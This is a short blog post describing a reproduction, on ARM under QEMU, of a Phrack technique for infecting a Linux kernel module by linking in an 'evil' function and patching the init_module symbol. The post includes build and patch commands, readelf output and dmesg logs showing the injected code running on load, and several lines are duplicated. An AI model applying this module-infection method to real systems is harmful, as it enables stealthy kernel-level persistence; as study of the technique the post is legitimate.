Interesting article in phrack))) I'd implement some sources
I made it for ARM with Codesourcery toolchain.
one issue in article
of course here must be 0x15 instead of 0x1b
One more thing
nika@nika-u:~/study/src/various_sources/various/elf_inject$ arm-linux-gnueabi-readelf -s simple.ko
Symbol table '.symtab' contains 58 entries:
Num: Value Size Type Bind Vis Ndx Name
...
49: 00000000 40 FUNC GLOBAL DEFAULT 1 evil
...
55: 00000028 40 FUNC GLOBAL DEFAULT 1 init
56: 00000050 28 FUNC GLOBAL DEFAULT 1 extt
I made it for ARM with Codesourcery toolchain.
one issue in article
of course here must be 0x15 instead of 0x1b
One more thing
nika@nika-u:~/study/src/various_sources/various/elf_inject$ arm-linux-gnueabi-readelf -s simple.ko
Symbol table '.symtab' contains 58 entries:
Num: Value Size Type Bind Vis Ndx Name
...
49: 00000000 40 FUNC GLOBAL DEFAULT 1 evil
...
55: 00000028 40 FUNC GLOBAL DEFAULT 1 init
56: 00000050 28 FUNC GLOBAL DEFAULT 1 extt
Look at value evil() function. It's 0x0. WTF??) But it's normal, it's not undefined symbol, it's just first function with offset 0x0 (this fact not highlighted in the phrack)
And example with my sources
nika@nika-u:~/study/src/various_sources/various/elf_inject$ ./build.sh
nika@nika-u:~/study/src/various_sources/various/elf_inject$ ./symb_globalize.sh
nika@nika-u:~/study/src/various_sources/various/elf_inject$ ./link_new.sh
nika@nika-u:~/study/src/various_sources/various/elf_inject$ arm-linux-gnueabi-readelf -s new4.ko | grep evil
52: 00000000 0 FILE LOCAL DEFAULT ABS evil4.c
63: 00000000 0 FILE LOCAL DEFAULT ABS evil4.mod.c
70: 00000028 40 FUNC GLOBAL DEFAULT 4 evil
nika@nika-u:~/study/src/various_sources/various/elf_inject$ arm-linux-gnueabi-readelf -s new4.ko | grep init
74: 00000000 40 FUNC GLOBAL DEFAULT 4 init_module
76: 00000000 40 FUNC GLOBAL DEFAULT 4 init
nika@nika-u:~/study/src/various_sources/various/elf_inject$ gcc elf-inject_for3.c
nika@nika-u:~/study/src/various_sources/various/elf_inject$ ./a.out new4.ko init_module 0x28
elf open...OK
check elf...OK
Number of sections inside elf: 43
found STRTAB section id:42 offs:0x00ce74... Ok
found symtab section id:43 number of symbols:78...OK
found init_module symbol id:74
elf patched...Ok
nika@nika-u:~/study/src/various_sources/various/elf_inject$
And on the target (QEMU)
# insmod new4.ko
# lsmod
Module Size Used by Tainted: G
simple4 1305 0
# rmmod simple4
# dmesg
....
/home/nika/study/src/various_sources/various/elf_inject/evil4.c: evil(): Injected
/home/nika/study/src/various_sources/various/elf_inject/simple4.c: init(): Hello, world!
/home/nika/study/src/various_sources/various/elf_inject/simple4.c: extt(): Goodbue, world!
#
On any other question refer to phrack article)
TODO
make globalize by hands)))
No comments:
Post a Comment